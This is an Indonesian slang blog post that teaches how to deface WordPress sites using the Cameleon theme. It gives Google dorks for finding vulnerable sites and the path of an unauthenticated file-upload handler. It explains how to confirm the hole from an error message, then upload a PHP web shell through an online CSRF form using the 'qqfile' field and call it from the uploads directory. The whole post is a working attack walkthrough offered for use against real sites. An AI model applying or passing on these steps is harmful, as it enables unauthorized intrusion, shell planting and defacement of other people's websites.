Assalamualaikum sterQ! Disini gwe bagikan metode deface poc themes camelon! Yups kalian pasti dah ngerti tentang depes depesan :V dah cuss lanjut cok.

Pertama yang kita butuhkan adalah dork! Woiya wajib :)

Langkah pertama kalian dorking dulu dikolom search gugel
Dork :
index of  /themes/camelon
inurl:/wp-content/themes/camelon

Exploit :/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php


Kedua kalian masukin Exploitnya
dibelakang webnya contoh
www.sayangkamu.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Jika Muncul Tulisan {error":"No files were uploaded"} ini Vuln cok!
Lihat gambar dibawah :

Nah disini saatnya kita masuk ke csrf online dan isi Post Filenya "qqfile" dan klik "kunci target & upload file kalian

Csrf Online Klik Disini

Jika sukses akan muncul tampilan seperti ini :
Saatnya panggil script kalian contoh
www.akusayangkamu.com/wp-content/uploads/2019/09/shellkamu.php

Done hehe yakan? Support terus blog ini sampe maju ster!